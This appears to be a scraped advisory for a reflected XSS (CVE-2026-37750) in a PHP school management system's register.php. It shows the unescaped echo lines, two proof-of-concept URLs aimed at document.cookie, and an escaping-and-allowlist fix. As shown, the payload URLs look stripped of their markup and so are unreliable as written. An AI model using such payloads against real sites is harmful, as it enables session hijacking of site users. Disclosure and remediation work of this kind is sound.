## https://sploitus.com/exploit?id=BCA69165-8702-570C-A1B0-314C03C74C96
# CVE-2026-37750
# CVE-2026-37750 - School Management System 1.0 - Reflected XSS
## Details
| Field | Info |
|---|---|
| **CVE ID** | CVE-2026-37750 |
| **Type** | Reflected Cross-Site Scripting (XSS) |
| **Severity** | Medium (CVSSv3: 6.1) |
| **Vendor** | mahmoudai1 |
| **Product** | School Management System |
| **Version** | 1.0 |
| **Discoverer** | Varad AP Mene |
| **CWE** | CWE-79 |
## Vulnerable File
register.php - Registration form (unauthenticated)
## Vulnerable Code
```php
// Line 22: the raw `type` parameter is echoed inside an <h1> element
echo ucfirst($_REQUEST['type']);
// Line 26: the same raw parameter is echoed inside the form's action attribute
echo $_REQUEST['type'];
```
No htmlspecialchars() call is applied, so raw user input is reflected directly into the HTML response.
## Proof of Concept
**Payload 1 - XSS in h1 tag:**
```
http://target/register.php?type=alert(document.cookie)
```
**Payload 2 - XSS in form action attribute:**
```
http://target/register.php?type=">alert(1)
```
## Impact
- Session hijacking via cookie theft
- Phishing attacks
- No authentication required
## Remediation
```php
echo htmlspecialchars($_REQUEST['type'], ENT_QUOTES, 'UTF-8');
```
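A fuller hardening of both reflection points, as an added example that is not the project's own code: the `type` value is reduced to an allowlist before use, and a single escaping helper with ENT_QUOTES covers both the element-text context (the h1) and the quoted-attribute context (the form action). The account-type values and the surrounding markup are assumptions, not taken from the project.

```php
<?php
// Added example, not the project's code. Assumes the registration form
// distinguishes a small set of account types; the values are constructed.
declare(strict_types=1);

const ALLOWED_TYPES = ['student', 'teacher'];

// Escape for HTML element text or a quoted attribute value. ENT_QUOTES
// encodes both ' and ", so a value cannot break out of action="..." either.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Reduce the attacker-controlled parameter to one of the expected values.
// Unknown input falls back to a default instead of being reflected at all.
function registrationType(array $request): string
{
    $type = strtolower(trim((string)($request['type'] ?? '')));
    return in_array($type, ALLOWED_TYPES, true) ? $type : ALLOWED_TYPES[0];
}

$type = registrationType($_REQUEST);

// The two places the advisory's lines 22 and 26 echoed the raw parameter,
// now allowlisted and escaped for their respective contexts.
echo '<h1>' . h(ucfirst($type)) . ' Registration</h1>' . "\n";
echo '<form method="post" action="register.php?type=' . h(urlencode($type)) . '">' . "\n";
echo '</form>' . "\n";
```

Escaping alone is the minimum fix; the allowlist additionally keeps unexpected values out of the page entirely, which also simplifies logging of anomalous requests.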
## Reference
https://github.com/mahmoudai1/school-management-system
## Discoverer
Varad AP Mene - menevarad007@gmail.com